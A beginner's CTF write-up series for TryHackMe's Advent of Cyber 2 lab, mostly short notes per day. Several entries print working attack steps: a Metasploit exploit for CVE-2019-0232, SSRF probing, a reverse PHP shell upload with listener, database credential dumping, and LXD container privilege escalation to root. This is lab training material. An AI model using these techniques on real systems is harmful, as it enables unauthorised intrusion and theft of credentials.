TryHackMe – Advent of Cyber 2

Get started with Cyber Security in 25 Days – Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

https://tryhackme.com/room/adventofcyber2

Here are my writeups! Happy Holidays folks πŸŽ„

Day 1: #Web #Cookies A Christmas Crisis

Day 2: #Web #RCE The Elf Strikes Back

Day 3: #Web #Authentication Christmas Chaos

Day 4: #Web #Fuzzing Santa's Watching

Day 5: #Web #SQLi Someone stole Santa's gift list!

Day 6: #Web #XSS Be careful with what you wish on a Christmas night

Day 7: #Networking #Wireshark The Grinch Really Did Steal Christmas

We're given 3 pcaps that need to be analysed.

pcap1

pcap 2

pcap 3

Day 8: #Networking #nmap #enumeration What's Under the Christmas Tree?

A quick recap of nmap:

Day 9: #Networking #ftp Anyone can be Santa!

Day 10: #Networking #smb Don't be sElfish!

enum4linux -U $IP – enumerate users on SMB server enum4linux -S $IP – enumerate shares on SMB server smbclient //$IP/$ShareName – connect to SMB share

Day 11: #Networking #privesc The Rogue Gnome

Day 12: #Networking #initialaccess Ready, Set, Elf

metasploit:

msfconsole
search CVE-2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
set lhost tun0
set rhost $remotehostIP
set URI $remotehostCGI
check
exploit
shell

the above gets us a user shell. Check privs with run post/windows/gather/win_privs

Day 13: #exploitation Coal for Christmas

Day 14: #osint Where's Rudolph?

Day 15 & 16: #python

#!/usr/bin/env python3
## TryHackMe Advent Calendar 2020 Day 16
## https://tryhackme.com/room/adventofcyber2

import requests

# The code below assumes an api endpoint with a odd-numbered key that we don't know the value of. The correct value will produce a flag.
# for loop to go over 1-100 key values, step by 2 to have odd numbers only

for api_key in range(1,100,2):
    # print what api key value we are iterating
    print(f"api_key {api_key}")
    # this is the api endoing we are sending requests to
    r = requests.get(f'http://EDITME_THMIP:8000/api/{api_key}')
    # only print text out if there are no failures or protections in place
    if "Error" not in str(r.text) and "PROTECTION" not in str(r.text):
        print(r.text)

Day 19: #SSRF #web The Naughty or Nice List

  1. Observe that searches are proxied internally via http://list.hohoho:8080/search.php?name=.
  2. Since an internal server is exposed, there are numerous things to do:
    • visit root of the host exposed e.g. http://list.hohoho:8080 via the URI parameter.
    • try different ports for enumeration.
    • check for any app side blocking/filtering e.g. visiting localhost via the proxy. If blocked, consider using localtest.me which resolves to 127.0.0.1 e.g. proxy=http://list.hohoho.localtest.me
    • this could lead to some sensitive exposure.

Day 17 & 18: #reversing #assembly #dotnet ReverseELFneering & The Bits of Christmas

Opening a binary with radare2 – r2 -d <file> Analysing a binary – aa List of functions – afl Print disassembly function – pdf @<function> Breakpoint – db <reference> Run program until breakpoint – dc View contents of memory address – px @<memory address> Move to next instruction – ds View %eax register – dr Reload program – ood


For DotNet applications, ILSpy and Dotpeek are good tools that can be used to decompile .NET applications and potentially view methods that contains information to bypass certain checks or authentication.

Day 20: #powershell PowershELlF to the rescue

Some intro to powershell and navigating the file and directory system:

Get-ChildItem -Path <> -File/-Directory -Hidden -ErrorAction SilentlyContinue The above would look for all items in a specified path that has either hidden files or folders and would not worry about any errors.

Measure-Object Can be piped to provide info on an object like words e.g. Get-Content file.txt | Measure-Object -Word

(Get-Content -Path file.txt)[index] Read something in a file at a specfic position. E.g. ...file.txt)[100] for the 99th character.

Select-String -Path ./Desktop -Pattern '*.txt' Find all txt files within the desktop. Can also be used to search for strings within a file.

Day 21: #forensics #powershell Time for some ELForensics

Day 22: #forensics Elf McEager becomes CyberElf

Data decoding via https://gchq.github.io/CyberChef/

Day 23: #forensics The Grinch strikes again!

Day 24

Find hidden web directories and php pages:

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x php

Visit the discovered file upload page and try to upload a reverse PHP shell. A simple file rename to .jpg.php doesn't work. See network connections and notice filter.js. Block this to circumvent the client side filter. Visit the file once shell is uploaded and reverse shell listener is set up.

rlwrap ncat -nlvp 1234

Upgrade shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

After finding the DB creds in the includes folder, connect to it using MySQL client.

$ msql -utron -p
$ show databases;
$ use tron;
$ show tables;
$ select * from users;

We find the user flynn's hashed password which can be cracked via crackstation. Using these credentials, SSH into localhost (or use su flynn). The flyn user is in the lxd group, allowing us to interact with linux containers (lxc).

$ lxc image list # see if there are any images we can use
$ lxc init $IMAGENAME $CONTAINERNAME -c security.privileged=true # create a new priv. container
$ lxc config device add $CONTAINERNAME $DEVICENAME disk source=/ path=/mnt/root recursive=true # add mounted device with path = root
$ lxc start $CONTAINERNAME
$ lxc exec $CONTAINERNAME /bin/sh # connect to the container shell